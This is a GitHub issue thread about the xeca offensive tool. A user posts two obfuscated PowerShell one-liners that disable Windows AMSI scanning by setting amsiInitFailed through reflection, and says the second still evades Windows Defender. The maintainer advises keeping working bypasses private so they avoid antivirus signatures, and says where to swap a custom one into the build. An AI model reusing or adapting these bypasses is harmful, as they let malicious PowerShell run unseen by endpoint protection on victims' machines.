### ISSUE TITLE
Issues with AMSI bypass in "xeca powershell <shellcode.ps1>"

### ISSUE THREAD

**Issue by Show-bags** [postrequest/xeca#1]
The current AMSI bypass used in "xeca powershell" command is detected by Windows Defender:

```
sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
```

Following AMSI bypass is working:

```
[ReF]."`A$(echo sse)`mB$(echo L)`Y"."g`E$(echo tty)p`E"(( "Sy{3}ana{1}ut{4}ti{2}{0}ils" -f'iUt','gement.A',"on.Am`s",'stem.M','oma') )."$(echo ge)`Tf`i$(echo El)D"(("{0}{2}ni{1}iled" -f'am','tFa',"`siI"),("{2}ubl{0}`,{1}{0}" -f 'ic','Stat','NonP'))."$(echo Se)t`Va$(echo LUE)"($(),$(1 -eq 1))
```

**Comment by postrequest** [comment]
Hi @Show-bags,

Thank you for that! I would love to introduce this into the project, although it is much better if you keep the AMSI bypass for yourself so that it may be of use for much longer without getting a signature!

Prior to compiling the project feel free to update the AMSI bypass [here](https://github.com/postrequest/xeca/blob/master/src/assets/amsi-bypass.ps1) for your own custom one that works as intended. Alternatively generate the payload and update the first line.

Happy hunting!
